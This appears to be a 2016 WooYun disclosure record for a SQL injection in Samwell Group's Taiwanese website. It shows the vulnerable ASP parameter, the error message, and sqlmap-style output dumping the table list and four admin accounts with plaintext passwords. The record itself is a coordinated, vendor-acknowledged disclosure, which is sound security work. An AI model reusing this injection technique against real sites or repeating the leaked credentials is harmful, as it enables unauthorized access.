当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167716

漏洞标题:Samwell集团www站点sql注入(4名管理员明文密码)(臺灣地區)

相关厂商:Samwell集团

漏洞作者: 路人甲

提交时间:2016-01-07 14:42

修复时间:2016-02-20 15:48

公开时间:2016-02-20 15:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-07: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-20: 细节向公众公开

简要描述:

详细说明:

注入点:

http://**.**.**.**/html/product01.asp?piid=3


单引号报错:

Microsoft OLE DB Provider for ODBC Drivers 錯誤 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 查詢運算式 'id='3'' order by pnid,pid' 中的 字串語法錯誤。
/html/product01.asp, 列99


[10:31:05] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access


[10:33:35] [WARNING] unable to retrieve the number of tables for database 'Micro
soft_Access_masterdb'
[10:33:35] [ERROR] cannot retrieve table names, back-end DBMS is Access
Database: Microsoft_Access_masterdb
[7 tables]
+-------------+
| adm         |
| alliances   |
| application |
| company     |
| new         |
| solutions   |
| us          |
+-------------+


明文密码

Table: adm
[4 entries]
+---------+---------------+---------+-----+----------+
| id      | ip            | name    | off | password |
+---------+---------------+---------+-----+----------+
| admin   | **.**.**.**  | <blank> | 0   | 8888     |
| sambest | **.**.**.** | Sambest | 0   | 23215165 |
| samtech | <blank>       | Samtech | 0   | 09464640 |
| samwell | **.**.**.**    | Samwell | 0   | 14011247 |
+---------+---------------+---------+-----+----------+


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2016-01-08 13:31

厂商回复:

感謝通報

最新状态:

暂无